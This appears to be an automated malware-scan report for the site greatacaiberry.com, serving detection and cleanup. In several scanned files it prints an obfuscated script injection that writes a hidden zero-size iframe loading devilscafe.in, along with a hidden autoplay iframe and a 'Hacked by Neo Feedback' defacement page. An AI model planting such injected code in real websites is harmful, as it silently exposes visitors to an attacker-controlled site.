Scanned pages/files
Request | Server response | Status |
http://www.greatacaiberry.com/ | 200 OK Content-Length: 5642 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E")); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1 <iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen> Deface/Content modification. The following signature was found: Hacked by Neo Feedback <html> <head> <title>Hacked by Neo Feedback</title> <link rel="icon" href="https://aronno1920.files.wordpress.com/2015/07/neofeedback.png" type="image/x-icon"> <script language="JavaScript">var brzinakucanja=200;var pauzapor=2000;var vremeid=null;var kretanje=false;var poruka=new Array();var slporuka=0;var bezporuke=0;poruka[0]="Hacked by Neo Feedback" poruka[1]="Hacked by N30 F33D64CK" function prikaz(){var text=poruka[slporuka];if(bezp ...[5713 bytes skipped]... | ||
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/javascript | clean |
http://www.greatacaiberry.com/typed.js | 200 OK Content-Length: 5650 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E")); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1 <iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen> | ||
http://www.greatacaiberry.com/test404page.js | 200 OK Content-Length: 5656 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E")); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1 <iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: greatacaiberry.com
Result:
GET / HTTP/1.1
Host: greatacaiberry.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: greatacaiberry.com
Referer: http://www.google.com/search?q=greatacaiberry.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: greatacaiberry.com
Referer: http://www.google.com/search?q=greatacaiberry.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=greatacaiberry.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://greatacaiberry.com/
Result: greatacaiberry.com is not infected or malware details are not published yet.
Result: greatacaiberry.com is not infected or malware details are not published yet.